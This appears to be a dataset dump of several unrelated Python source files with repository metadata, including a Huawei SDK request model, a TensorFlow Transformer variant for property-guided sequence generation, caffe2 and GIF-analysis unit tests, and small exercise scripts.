是否进行对象选择,是:自定义迁移对象,否:全部迁移,不填默认为否。
:return: The selected of this UpdateDatabaseObjectReq.
:rtype: bool
"""
return self._selected
@selected.setter
def selected(self, selected):
"""Sets the selected of this UpdateDatabaseObjectReq.
是否进行对象选择,是:自定义迁移对象,否:全部迁移,不填默认为否。
:param selected: The selected of this UpdateDatabaseObjectReq.
:type: bool
"""
self._selected = selected
@property
def sync_database(self):
"""Gets the sync_database of this UpdateDatabaseObjectReq.
是否库级同步
:return: The sync_database of this UpdateDatabaseObjectReq.
:rtype: bool
"""
return self._sync_database
@sync_database.setter
def sync_database(self, sync_database):
"""Sets the sync_database of this UpdateDatabaseObjectReq.
是否库级同步
:param sync_database: The sync_database of this UpdateDatabaseObjectReq.
:type: bool
"""
self._sync_database = sync_database
@property
def job(self):
"""Gets the job of this UpdateDatabaseObjectReq.
数据对象选择信息,selected为true时必填。
:return: The job of this UpdateDatabaseObjectReq.
:rtype: list[DatabaseInfo]
"""
return self._job
@job.setter
def job(self, job):
"""Sets the job of this UpdateDatabaseObjectReq.
数据对象选择信息,selected为true时必填。
:param job: The job of this UpdateDatabaseObjectReq.
:type: list[DatabaseInfo]
"""
self._job = job
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UpdateDatabaseObjectReq):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
]
| |
a0fe504dc7c1f9b916085038b62f0c6730b2f12e | 4f1144a15ba86cc183c5c69e578db8019133e660 | /src/official/transformer/v2/optgen_v13.py | 4d5704a53d28e02a0633f5fa29f6e7462359e4ca | [
"MIT"
]
| permissive | AspirinCode/cmg | 244b718c64659cde505cedc449a5b65e5ede7c6d | fe5b4d8778df7bd85f78ec463d85185415a1c591 | refs/heads/main | 2023-01-03T09:42:47.433393 | 2020-10-26T21:39:29 | 2020-10-26T21:39:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30,494 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Defines the Transformer model in TF 2.0.
Model paper: https://arxiv.org/pdf/1706.03762.pdf
Transformer model code source: https://github.com/tensorflow/tensor2tensor
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from src.official.transformer.model import model_utils
from src.official.transformer.v2 import attention_layer
from src.official.transformer.v2 import beam_search
from src.official.transformer.v2 import embedding_layer
from src.official.transformer.v2 import ffn_layer
from src.official.transformer.v2 import metrics
def get_valnet(logits, embedding_softmax_layer, lstm_layer, output_layer):
ids = tf.keras.backend.argmax(logits, axis=-1)
embedded_inputs = embedding_softmax_layer(ids)
z = lstm_layer(embedded_inputs)
outputs = output_layer(z)
return outputs
def get_propnet(logits, embedding_softmax_layer, lstm_layer, idense_layer, output_layer):
ids = tf.keras.backend.argmax(logits, axis=-1)
embedded_inputs = embedding_softmax_layer(ids)
z = lstm_layer(embedded_inputs)
z = idense_layer(z)
outputs = output_layer(z)
return outputs
def get_simnet(logit1, inputs, embedding_softmax_layer, lstm_layer, idense_layer, output_layer):
ids1 = tf.keras.backend.argmax(logit1, axis=-1)
ids2 = inputs
embedded_input1 = embedding_softmax_layer(ids1)
embedded_input2 = embedding_softmax_layer(ids2)
seq1 = lstm_layer(embedded_input1) # [?, 64]
seq2 = lstm_layer(embedded_input2) # [?, 64]
z = tf.concat([seq1, seq2], axis=1) # [?, 128]
z = idense_layer(z)
outputs = output_layer(z)
return outputs
def create_model(params, is_train):
"""Creates transformer model."""
with tf.name_scope("model"):
if is_train:
inputs = tf.keras.layers.Input((None,), dtype="int64", name="inputs")
targets = tf.keras.layers.Input((None,), dtype="int64", name="targets")
px = tf.keras.layers.Input((3,), dtype="float32", name="px")
py = tf.keras.layers.Input((3,), dtype="float32", name="py")
# sim = tf.keras.layers.Input((1,), dtype="float32", name="sim")
internal_model = Transformer(params, name="optgen_v13")
logits = internal_model([inputs, px, py, targets], training=is_train)
# logits = internal_model([inputs, px, sim, py, targets], training=is_train)
vocab_size = params["vocab_size"]
label_smoothing = params["label_smoothing"]
if params["enable_metrics_in_training"]:
logits = metrics.MetricLayer(vocab_size)([logits, targets])
logits = tf.keras.layers.Lambda(lambda x: x, name="logits")(logits)
valnet_embedding_softmax_layer = embedding_layer.EmbeddingFreezable(
params["vocab_size"], params["valnet_hidden_size"], trainable=False)
valnet_bi_lstm_layer = tf.keras.layers.Bidirectional(
tf.keras.layers.LSTM(params["valnet_hidden_size"], name="valnet_lstm", trainable=False))
valnet_output_layer = tf.keras.layers.Dense(1, use_bias=True, activation=tf.nn.sigmoid, name="valnet_output",
trainable=False)
valnet_hat = get_valnet(logits, valnet_embedding_softmax_layer, valnet_bi_lstm_layer, valnet_output_layer)
propnet_embedding_softmax_layer = embedding_layer.EmbeddingFreezable(
params["vocab_size"], params["propnet_hidden_size"], trainable=False)
propnet_bi_lstm_layer = tf.keras.layers.Bidirectional(
tf.keras.layers.LSTM(params["propnet_hidden_size"], name="prop_lstm", trainable=False))
propnet_idense_layer = tf.keras.layers.Dense(100, use_bias=True, activation=tf.nn.sigmoid,
name="propnet_idense", trainable=False)
propnet_output_layer = tf.keras.layers.Dense(3, use_bias=True, activation=tf.nn.sigmoid,
name="propnet_output", trainable=False)
propnet_hat = get_propnet(logits, propnet_embedding_softmax_layer, propnet_bi_lstm_layer,
propnet_idense_layer, propnet_output_layer)
simnet_embedding_softmax_layer = embedding_layer.EmbeddingFreezable(
params["vocab_size"], params["simnet_hidden_size"], trainable=False)
simnet_bi_lstm_layer = tf.keras.layers.Bidirectional(
tf.keras.layers.LSTM(params["simnet_hidden_size"], name="simnet_lstm", trainable=False))
simnet_idense_layer = tf.keras.layers.Dense(100, use_bias=True, activation=tf.nn.relu, name="simnet_idense",
trainable=False)
simnet_output_layer = tf.keras.layers.Dense(1, use_bias=True, activation=tf.nn.sigmoid, name="simnet_output",
trainable=False)
simnet_hat = get_simnet(logits, inputs, simnet_embedding_softmax_layer, simnet_bi_lstm_layer,
simnet_idense_layer, simnet_output_layer)
model = tf.keras.Model([inputs, px, py, targets], logits)
# model = tf.keras.Model([inputs, px, sim, py, targets], logits)
loss = metrics.transformer_loss(
logits, targets, label_smoothing, vocab_size)
model.add_loss(loss)
valnet_true = tf.ones_like(valnet_hat)
loss_valnet = tf.keras.losses.binary_crossentropy(
valnet_true,
valnet_hat,
from_logits=False,
label_smoothing=0
)
model.add_loss(tf.reduce_sum(loss_valnet))
propnet_true = tf.keras.layers.Lambda(lambda x: x)(py)
loss_propnet = tf.keras.losses.mse(propnet_true, propnet_hat)
model.add_loss(tf.reduce_sum(loss_propnet))
simnet_true = tf.ones_like(simnet_hat)
loss_simnet = tf.keras.losses.binary_crossentropy(
simnet_true,
simnet_hat,
from_logits=False,
label_smoothing=0
)
model.add_loss(tf.reduce_sum(loss_simnet))
return model
else:
inputs = tf.keras.layers.Input((None,), dtype="int64", name="inputs")
px = tf.keras.layers.Input((3,), dtype="float32", name="px")
py = tf.keras.layers.Input((3,), dtype="float32", name="py")
# sim = tf.keras.layers.Input((1,), dtype="float32", name="sim")
internal_model = Transformer(params, name="optgen_v13")
# ret = internal_model([inputs, px, sim, py], training=is_train)
ret = internal_model([inputs, px, py], training=is_train)
outputs, scores = ret["outputs"], ret["scores"]
return tf.keras.Model([inputs, px, py], [outputs, scores])
# return tf.keras.Model([inputs, px, sim, py], [outputs, scores])
class Transformer(tf.keras.Model):
"""Transformer model with Keras.
Implemented as described in: https://arxiv.org/pdf/1706.03762.pdf
The Transformer model consists of an encoder and decoder. The input is an int
sequence (or a batch of sequences). The encoder produces a continuous
representation, and the decoder uses the encoder output to generate
probabilities for the output sequence.
"""
def __init__(self, params, name=None):
"""Initialize layers to build Transformer model.
Args:
params: hyperparameter object defining layer sizes, dropout values, etc.
name: name of the model.
"""
super(Transformer, self).__init__(name=name)
self.params = params
self.embedding_softmax_layer = embedding_layer.EmbeddingSharedWeights(
params["vocab_size"], params["hidden_size"])
self.encoder_stack = EncoderStack(params)
self.decoder_stack = DecoderStack(params)
self.property_emb_layer = tf.keras.layers.Dense(3, use_bias=True, activation=tf.nn.relu,
name="property_embedding")
def get_config(self):
return {
"params": self.params,
}
def call(self, inputs, training):
"""Calculate target logits or inferred target sequences.
Args:
inputs: input tensor list of size 1 or 2.
First item, inputs: int tensor with shape [batch_size, input_length].
Second item (optional), targets: None or int tensor with shape
[batch_size, target_length].
training: boolean, whether in training mode or not.
Returns:
If targets is defined, then return logits for each word in the target
sequence. float tensor with shape [batch_size, target_length, vocab_size]
If target is none, then generate output sequence one token at a time.
returns a dictionary {
outputs: [batch_size, decoded length]
scores: [batch_size, float]}
Even when float16 is used, the output tensor(s) are always float32.
"""
if len(inputs) == 4:
inputs, px, py, targets = inputs[0], inputs[1], inputs[2], inputs[3]
else: # 3
inputs, px, py, targets = inputs[0], inputs[1], inputs[2], None
# if len(inputs) == 5:
# inputs, px, sim, py, targets = inputs[0], inputs[1], inputs[2], inputs[3], inputs[4]
# else: # 4
# inputs, px, sim, py, targets = inputs[0], inputs[1], inputs[2], inputs[3], None
# Variance scaling is used here because it seems to work in many problems.
# Other reasonable initializers may also work just as well.
with tf.name_scope("Transformer"):
# Calculate attention bias for encoder self-attention and decoder
# multi-headed attention layers.
attention_bias = model_utils.get_padding_bias(inputs)
# Run the inputs through the encoder layer to map the symbol
# representations to continuous representations.
encoder_outputs = self.encode(inputs, attention_bias, training)
# encoder_outputs = self.concat_property(encoder_outputs, px, sim, py)
encoder_outputs = self.concat_property(encoder_outputs, px, py)
# Generate output sequence if targets is None, or return logits if target
# sequence is known.
if targets is None:
return self.predict(encoder_outputs, attention_bias, training)
else:
logits = self.decode(targets, encoder_outputs, attention_bias, training)
return logits
def concat_property(self, encoder_outputs, px, py):
# def concat_property(sefl, encoder_outputs, px, sim, py):
"""Generate logits for each value in the target sequence.
Args:
encoder_outputs: continuous representation of input sequence. float tensor
with shape [batch_size, input_length, hidden_size]
px: float tensor with property of x [batch_size, 3]
py: float tensor with property of y [batch_size, 3]
Returns:
float32 tensor with shape [batch_size, input_length, hidden_size+6]
"""
input_length = tf.shape(encoder_outputs)[1]
px = self.property_emb_layer(px)
py = self.property_emb_layer(py)
px = tf.tile(tf.expand_dims(px, axis=1), multiples=[1, input_length, 1])
# sim = tf.tile(tf.expand_dims(sim, axis=1), multiples=[1, input_length, 1])
py = tf.tile(tf.expand_dims(py, axis=1), multiples=[1, input_length, 1])
result = tf.concat([encoder_outputs, px, py], axis=-1)
# result = tf.concat([encoder_outputs, px, sim, py], axis=-1)
return result
def encode(self, inputs, attention_bias, training):
"""Generate continuous representation for inputs.
Args:
inputs: int tensor with shape [batch_size, input_length].
attention_bias: float tensor with shape [batch_size, 1, 1, input_length].
training: boolean, whether in training mode or not.
Returns:
float tensor with shape [batch_size, input_length, hidden_size]
"""
with tf.name_scope("encode"):
# Prepare inputs to the layer stack by adding positional encodings and
# applying dropout.
embedded_inputs = self.embedding_softmax_layer(inputs)
embedded_inputs = tf.cast(embedded_inputs, self.params["dtype"])
inputs_padding = model_utils.get_padding(inputs)
attention_bias = tf.cast(attention_bias, self.params["dtype"])
with tf.name_scope("add_pos_encoding"):
length = tf.shape(embedded_inputs)[1]
pos_encoding = model_utils.get_position_encoding(
length, self.params["hidden_size"])
pos_encoding = tf.cast(pos_encoding, self.params["dtype"])
encoder_inputs = embedded_inputs + pos_encoding
if training:
encoder_inputs = tf.nn.dropout(
encoder_inputs, rate=self.params["layer_postprocess_dropout"])
return self.encoder_stack(
encoder_inputs, attention_bias, inputs_padding, training=training)
def decode(self, targets, encoder_outputs, attention_bias, training):
"""Generate logits for each value in the target sequence.
Args:
targets: target values for the output sequence. int tensor with shape
[batch_size, target_length]
encoder_outputs: continuous representation of input sequence. float tensor
with shape [batch_size, input_length, hidden_size]
attention_bias: float tensor with shape [batch_size, 1, 1, input_length]
training: boolean, whether in training mode or not.
Returns:
float32 tensor with shape [batch_size, target_length, vocab_size]
"""
with tf.name_scope("decode"):
# Prepare inputs to decoder layers by shifting targets, adding positional
# encoding and applying dropout.
decoder_inputs = self.embedding_softmax_layer(targets)
decoder_inputs = tf.cast(decoder_inputs, self.params['dtype'])
attention_bias = tf.cast(attention_bias, self.params["dtype"])
with tf.name_scope("shift_targets"):
# Shift targets to the right, and remove the last element
decoder_inputs = tf.pad(decoder_inputs,
[[0, 0], [1, 0], [0, 0]])[:, :-1, :]
with tf.name_scope("add_pos_encoding"):
length = tf.shape(decoder_inputs)[1]
pos_encoding = model_utils.get_position_encoding(
length, self.params["hidden_size"])
pos_encoding = tf.cast(pos_encoding, self.params["dtype"])
decoder_inputs += pos_encoding
if training:
decoder_inputs = tf.nn.dropout(
decoder_inputs, rate=self.params["layer_postprocess_dropout"])
# Run values
decoder_self_attention_bias = model_utils.get_decoder_self_attention_bias(
length, dtype=self.params['dtype'])
outputs = self.decoder_stack(
decoder_inputs,
encoder_outputs,
decoder_self_attention_bias,
attention_bias,
training=training)
logits = self.embedding_softmax_layer(outputs, mode="linear")
logits = tf.cast(logits, tf.float32)
return logits
def _get_symbols_to_logits_fn(self, max_decode_length, training):
"""Returns a decoding function that calculates logits of the next tokens."""
timing_signal = model_utils.get_position_encoding(
max_decode_length + 1, self.params["hidden_size"])
decoder_self_attention_bias = model_utils.get_decoder_self_attention_bias(
max_decode_length)
def symbols_to_logits_fn(ids, i, cache):
"""Generate logits for next potential IDs.
Args:
ids: Current decoded sequences. int tensor with shape [batch_size *
beam_size, i + 1]
i: Loop index
cache: dictionary of values storing the encoder output, encoder-decoder
attention bias, and previous decoder attention values.
Returns:
Tuple of
(logits with shape [batch_size * beam_size, vocab_size],
updated cache values)
"""
# Set decoder input to the last generated IDs
decoder_input = ids[:, -1:]
# Preprocess decoder input by getting embeddings and adding timing signal.
decoder_input = self.embedding_softmax_layer(decoder_input)
decoder_input += timing_signal[i:i + 1]
self_attention_bias = decoder_self_attention_bias[:, :, i:i + 1, :i + 1]
decoder_outputs = self.decoder_stack(
decoder_input,
cache.get("encoder_outputs"),
self_attention_bias,
cache.get("encoder_decoder_attention_bias"),
training=training,
cache=cache)
logits = self.embedding_softmax_layer(decoder_outputs, mode="linear")
logits = tf.squeeze(logits, axis=[1])
return logits, cache
return symbols_to_logits_fn
def predict(self, encoder_outputs, encoder_decoder_attention_bias, training):
"""Return predicted sequence."""
# Currently, we always do prediction in float32.
# TODO(reedwm): Add float16 support.
encoder_outputs = tf.cast(encoder_outputs, tf.float32)
batch_size = tf.shape(encoder_outputs)[0]
input_length = tf.shape(encoder_outputs)[1]
max_decode_length = input_length + self.params["extra_decode_length"]
symbols_to_logits_fn = self._get_symbols_to_logits_fn(
max_decode_length, training)
# Create initial set of IDs that will be passed into symbols_to_logits_fn.
initial_ids = tf.ones([batch_size], dtype=tf.int32) # 1: [BEGIN]
# Create cache storing decoder attention values for each layer.
# pylint: disable=g-complex-comprehension
cache = {
"layer_%d" % layer: {
"k": tf.zeros([batch_size, 0, self.params["hidden_size"]]),
"v": tf.zeros([batch_size, 0, self.params["hidden_size"]])
} for layer in range(self.params["num_hidden_layers"])
}
# pylint: enable=g-complex-comprehension
# Add encoder output and attention bias to the cache.
cache["encoder_outputs"] = encoder_outputs
cache["encoder_decoder_attention_bias"] = encoder_decoder_attention_bias
# Use beam search to find the top beam_size sequences and scores.
decoded_ids, scores = beam_search.sequence_beam_search(
symbols_to_logits_fn=symbols_to_logits_fn,
initial_ids=initial_ids,
initial_cache=cache,
vocab_size=self.params["vocab_size"],
beam_size=self.params["beam_size"],
alpha=self.params["alpha"],
max_decode_length=max_decode_length,
eos_id=2) # 2: [END]
import sys
# tf.print(decoded_ids.shape, output_stream=sys.stderr)
# Get the top sequence for each batch element
# top_decoded_ids = decoded_ids[:, 0, 1:]
# for i in range(self.params["beam_size"]):
# candidate_ids = decoded_ids[:, i, 0:] #should include [begin], [batch, beam_size, length]
#
# get_propnet(params, candidate_ids)
top_decoded_ids = decoded_ids[:, 0, 0:] #should include [begin], [batch, beam_size, length]
top_scores = scores[:, 0]
return {"outputs": top_decoded_ids, "scores": top_scores}
class LayerNormalization(tf.keras.layers.Layer):
"""Applies layer normalization."""
def __init__(self, hidden_size):
super(LayerNormalization, self).__init__()
self.hidden_size = hidden_size
def build(self, input_shape):
"""Builds the layer."""
# Passing experimental_autocast=False causes these variables to not be
# automatically casted to fp16 when mixed precision is used. Since we use
# float32 in call() for numeric stability, we do not want variables to be
# casted to fp16.
self.scale = self.add_weight(
"layer_norm_scale",
shape=[self.hidden_size],
dtype="float32",
initializer=tf.ones_initializer(),
experimental_autocast=False)
self.bias = self.add_weight(
"layer_norm_bias",
shape=[self.hidden_size],
dtype="float32",
initializer=tf.zeros_initializer(),
experimental_autocast=False)
super(LayerNormalization, self).build(input_shape)
def get_config(self):
return {
"hidden_size": self.hidden_size,
}
def call(self, x, epsilon=1e-6):
input_dtype = x.dtype
if input_dtype == tf.float16:
x = tf.cast(x, tf.float32)
mean = tf.reduce_mean(x, axis=[-1], keepdims=True)
variance = tf.reduce_mean(tf.square(x - mean), axis=[-1], keepdims=True)
norm_x = (x - mean) * tf.math.rsqrt(variance + epsilon)
return tf.cast(norm_x * self.scale + self.bias, input_dtype)
class PrePostProcessingWrapper(tf.keras.layers.Layer):
"""Wrapper class that applies layer pre-processing and post-processing."""
def __init__(self, layer, params):
super(PrePostProcessingWrapper, self).__init__()
self.layer = layer
self.params = params
self.postprocess_dropout = params["layer_postprocess_dropout"]
def build(self, input_shape):
# Create normalization layer
self.layer_norm = LayerNormalization(self.params["hidden_size"])
super(PrePostProcessingWrapper, self).build(input_shape)
def get_config(self):
return {
"params": self.params,
}
def call(self, x, *args, **kwargs):
"""Calls wrapped layer with same parameters."""
# Preprocessing: apply layer normalization
training = kwargs["training"]
y = self.layer_norm(x)
# Get layer output
y = self.layer(y, *args, **kwargs)
# Postprocessing: apply dropout and residual connection
if training:
y = tf.nn.dropout(y, rate=self.postprocess_dropout)
return x + y
class EncoderStack(tf.keras.layers.Layer):
"""Transformer encoder stack.
The encoder stack is made up of N identical layers. Each layer is composed
of the sublayers:
1. Self-attention layer
2. Feedforward network (which is 2 fully-connected layers)
"""
def __init__(self, params):
super(EncoderStack, self).__init__()
self.params = params
self.layers = []
def build(self, input_shape):
"""Builds the encoder stack."""
params = self.params
for _ in range(params["num_hidden_layers"]):
# Create sublayers for each layer.
self_attention_layer = attention_layer.SelfAttention(
params["hidden_size"], params["num_heads"],
params["attention_dropout"])
feed_forward_network = ffn_layer.FeedForwardNetwork(
params["hidden_size"], params["filter_size"], params["relu_dropout"])
self.layers.append([
PrePostProcessingWrapper(self_attention_layer, params),
PrePostProcessingWrapper(feed_forward_network, params)
])
# Create final layer normalization layer.
self.output_normalization = LayerNormalization(params["hidden_size"])
super(EncoderStack, self).build(input_shape)
def get_config(self):
return {
"params": self.params,
}
def call(self, encoder_inputs, attention_bias, inputs_padding, training):
"""Return the output of the encoder layer stacks.
Args:
encoder_inputs: tensor with shape [batch_size, input_length, hidden_size]
attention_bias: bias for the encoder self-attention layer. [batch_size, 1,
1, input_length]
inputs_padding: tensor with shape [batch_size, input_length], inputs with
zero paddings.
training: boolean, whether in training mode or not.
Returns:
Output of encoder layer stack.
float32 tensor with shape [batch_size, input_length, hidden_size]
"""
for n, layer in enumerate(self.layers):
# Run inputs through the sublayers.
self_attention_layer = layer[0]
feed_forward_network = layer[1]
with tf.name_scope("layer_%d" % n):
with tf.name_scope("org_encoder_self_attention"):
encoder_inputs = self_attention_layer(
encoder_inputs, attention_bias, training=training)
with tf.name_scope("org_encoder_ffn_org"):
encoder_inputs = feed_forward_network(
encoder_inputs, training=training)
return self.output_normalization(encoder_inputs)
class DecoderStack(tf.keras.layers.Layer):
"""Transformer decoder stack.
Like the encoder stack, the decoder stack is made up of N identical layers.
Each layer is composed of the sublayers:
1. Self-attention layer
2. Multi-headed attention layer combining encoder outputs with results from
the previous self-attention layer.
3. Feedforward network (2 fully-connected layers)
"""
def __init__(self, params):
super(DecoderStack, self).__init__()
self.params = params
self.layers = []
def build(self, input_shape):
"""Builds the decoder stack."""
params = self.params
for _ in range(params["num_hidden_layers"]):
self_attention_layer = attention_layer.SelfAttention(
params["hidden_size"], params["num_heads"],
params["attention_dropout"])
enc_dec_attention_layer = attention_layer.Attention(
params["hidden_size"], params["num_heads"],
params["attention_dropout"])
feed_forward_network = ffn_layer.FeedForwardNetwork(
params["hidden_size"], params["filter_size"], params["relu_dropout"])
self.layers.append([
PrePostProcessingWrapper(self_attention_layer, params),
PrePostProcessingWrapper(enc_dec_attention_layer, params),
PrePostProcessingWrapper(feed_forward_network, params)
])
self.output_normalization = LayerNormalization(params["hidden_size"])
super(DecoderStack, self).build(input_shape)
def get_config(self):
return {
"params": self.params,
}
def call(self,
decoder_inputs,
encoder_outputs,
decoder_self_attention_bias,
attention_bias,
training,
cache=None):
"""Return the output of the decoder layer stacks.
Args:
decoder_inputs: tensor with shape [batch_size, target_length, hidden_size]
encoder_outputs: tensor with shape [batch_size, input_length, hidden_size]
decoder_self_attention_bias: bias for decoder self-attention layer. [1, 1,
target_len, target_length]
attention_bias: bias for encoder-decoder attention layer. [batch_size, 1,
1, input_length]
training: boolean, whether in training mode or not.
cache: (Used for fast decoding) A nested dictionary storing previous
decoder self-attention values. The items are:
{layer_n: {"k": tensor with shape [batch_size, i, key_channels],
"v": tensor with shape [batch_size, i, value_channels]},
...}
Returns:
Output of decoder layer stack.
float32 tensor with shape [batch_size, target_length, hidden_size]
"""
for n, layer in enumerate(self.layers):
self_attention_layer = layer[0]
enc_dec_attention_layer = layer[1]
feed_forward_network = layer[2]
# Run inputs through the sublayers.
layer_name = "layer_%d" % n
layer_cache = cache[layer_name] if cache is not None else None
with tf.name_scope(layer_name):
with tf.name_scope("org_decoder_self_attention"):
decoder_inputs = self_attention_layer(
decoder_inputs,
decoder_self_attention_bias,
training=training,
cache=layer_cache)
with tf.name_scope("org_decoder_encdec_attention"):
decoder_inputs = enc_dec_attention_layer(
decoder_inputs,
encoder_outputs,
attention_bias,
training=training)
with tf.name_scope("org_decoder_ffn"):
decoder_inputs = feed_forward_network(
decoder_inputs, training=training)
return self.output_normalization(decoder_inputs)
| [
"[email protected]"
]
| |
3642d4130b2a6948154873329d6f8ed1f4a69df7 | 4f408d65db60911f56110c351cb3b64835e0c5fb | /caffe2/python/net_printer_test.py | 2d6f5a172326cc0d170bb65254e0db72b09f873c | [
"Apache-2.0",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
]
| permissive | KeyKy/caffe2_SSD | a02c065aef2dbcfd00faae8be0440d7a4ff0fb76 | 7235688ea5e212dbe8609d780dd94c8c7d9fef54 | refs/heads/master | 2021-09-18T14:36:11.247427 | 2018-07-10T09:59:35 | 2018-07-10T09:59:35 | 89,928,918 | 8 | 5 | null | 2018-07-27T02:14:38 | 2017-05-01T14:04:20 | Jupyter Notebook | UTF-8 | Python | false | false | 2,901 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import net_printer
from caffe2.python.checkpoint import Job
from caffe2.python.net_builder import ops
from caffe2.python.task import Task, final_output
import unittest
def example_loop():
with Task():
total = ops.Const(0)
total_large = ops.Const(0)
total_small = ops.Const(0)
total_tiny = ops.Const(0)
with ops.loop(10) as loop:
outer = ops.Mul([loop.iter(), ops.Const(10)])
with ops.loop(loop.iter()) as inner:
val = ops.Add([outer, inner.iter()])
with ops.If(ops.GE([val, ops.Const(80)])) as c:
ops.Add([total_large, val], [total_large])
with c.Elif(ops.GE([val, ops.Const(50)])) as c:
ops.Add([total_small, val], [total_small])
with c.Else():
ops.Add([total_tiny, val], [total_tiny])
ops.Add([total, val], total)
def example_task():
with Task():
with ops.task_init():
one = ops.Const(1)
two = ops.Add([one, one])
with ops.task_init():
three = ops.Const(3)
accum = ops.Add([two, three])
# here, accum should be 5
with ops.task_exit():
# here, accum should be 6, since this executes after lines below
seven_1 = ops.Add([accum, one])
six = ops.Add([accum, one])
ops.Add([accum, one], [accum])
seven_2 = ops.Add([accum, one])
o6 = final_output(six)
o7_1 = final_output(seven_1)
o7_2 = final_output(seven_2)
return o6, o7_1, o7_2
def example_job():
with Job() as job:
with job.init_group:
example_loop()
example_task()
return job
class TestNetPrinter(unittest.TestCase):
def test_print(self):
self.assertTrue(len(net_printer.to_string(example_job())) > 0)
def test_valid_job(self):
job = example_job()
with job:
with Task():
# distributed_ctx_init_* ignored by analyzer
ops.Add(['distributed_ctx_init_a', 'distributed_ctx_init_b'])
net_printer.analyze(example_job())
def test_undefined_blob(self):
job = example_job()
with job:
with Task():
ops.Add(['a', 'b'])
with self.assertRaises(AssertionError):
net_printer.analyze(job)
def test_multiple_definition(self):
job = example_job()
with job:
with Task():
ops.Add([ops.Const(0), ops.Const(1)], 'out1')
with Task():
ops.Add([ops.Const(2), ops.Const(3)], 'out1')
with self.assertRaises(AssertionError):
net_printer.analyze(job)
| [
"[email protected]"
]
| |
549746b4c2e4c7057bd7732d19f58753950efb1d | 5a3c4b802ea7d5ce380c38415929ebaa8799eb06 | /tests/test_analyze_gifs.py | 700b9bad30c536d79dd4ab352c4a24dcff1e0a73 | [
"MIT"
]
| permissive | get-wrecked/gifalyzer | fe18855c83b2b9e2188faef92b317fa81e913b4d | 0731d03766cfecf3fc6c64cc17022563da09b85b | refs/heads/master | 2022-04-10T10:57:35.602500 | 2019-06-10T22:32:04 | 2019-06-10T22:32:04 | 93,275,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | import os
import pytest
from gifalyzer import analyze_gif
def test_analyze_gifs_normal():
report = analyze_gif(get_sample('200x202-26-130-130-0.gif'))
assert report['dimensions'] == (200, 202)
assert report['frame_count'] == 26
assert report['frame_delay_ms'] == 130
assert report['last_frame_delay_ms'] == 130
assert report['loop'] == 0
def get_sample(sample_name):
sample_dir = os.path.join(os.path.dirname(__file__), 'samples')
return os.path.join(sample_dir, sample_name)
| [
"[email protected]"
]
| |
ee57158af40112b19388d679d38127b30806d32a | c9ad6ad969de505b3c8471c6f46dfd782a0fb498 | /0x05-python-exceptions/0-safe_print_list.py | 16119623870bda212d1982f12fcd78d50aa22dde | []
| no_license | enterpreneur369/holbertonschool-higher_level_programming | 002fd5a19b40c8b1db06b34c4344e307f24c17ac | dd7d3f14bf3bacb41e2116d732ced78998a4afcc | refs/heads/master | 2022-06-20T00:57:27.736122 | 2020-05-06T14:26:10 | 2020-05-06T14:26:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | #!/usr/bin/python3
""" safe_print_list
Python function to print the elements of a list
"""
def safe_print_list(my_list=[], x=0):
i, p = 0, 0
try:
for i in range(x):
print("{}".format(my_list[i]), end="")
p = p + 1
except IndexError as err:
pass
finally:
print()
return (p)
| [
"[email protected]"
]
| |
8a1230827541d821262fb3f1280ea53c87565736 | 8c618e16b15ad33a6ab6dcc4e0511e7a3acba094 | /remcall/schema/__init__.py | 8eb3a63f088ff55fb93ab052c031ca2d24a80f9d | [
"MIT"
]
| permissive | luphord/remcall | 0bef9bbf13be697645f7b93fbd9a5e3ee9afd97b | 31419ff0f5c21ea2d90f9cabdaec85b6eebcaa12 | refs/heads/trunk | 2021-12-25T23:44:39.888706 | 2021-12-03T08:15:58 | 2021-12-03T08:15:58 | 165,920,464 | 0 | 0 | MIT | 2021-12-03T08:15:59 | 2019-01-15T20:42:12 | Python | UTF-8 | Python | false | false | 634 | py | from .core import Type, Interface, Enum, Record, Primitive, Method, \
string, int8, int16, int32, int64, uint8, uint16, \
uint32, uint64, float32, float64, void, boolean, \
date, datetime, time, primitive_types, Array, Schema
from .base import assert_name
__all__ = ['Type', 'Interface', 'Enum', 'Record', 'Primitive', 'Method',
'string', 'int8', 'int16', 'int32', 'int64', 'uint8', 'uint16',
'uint32', 'uint64', 'float32', 'float64', 'void', 'boolean',
'date', 'datetime', 'time', 'assert_name', 'primitive_types',
'Array', 'Schema']
| [
"[email protected]"
]
| |
7dd54bed4c22108fdd325ab8efa1459e4fdd1d11 | a47192d5abd5f34f63b2c0e27b954ae07de47302 | /day20/range.py | d17de1cba89cc621b63647419a191c9a16be7aa0 | []
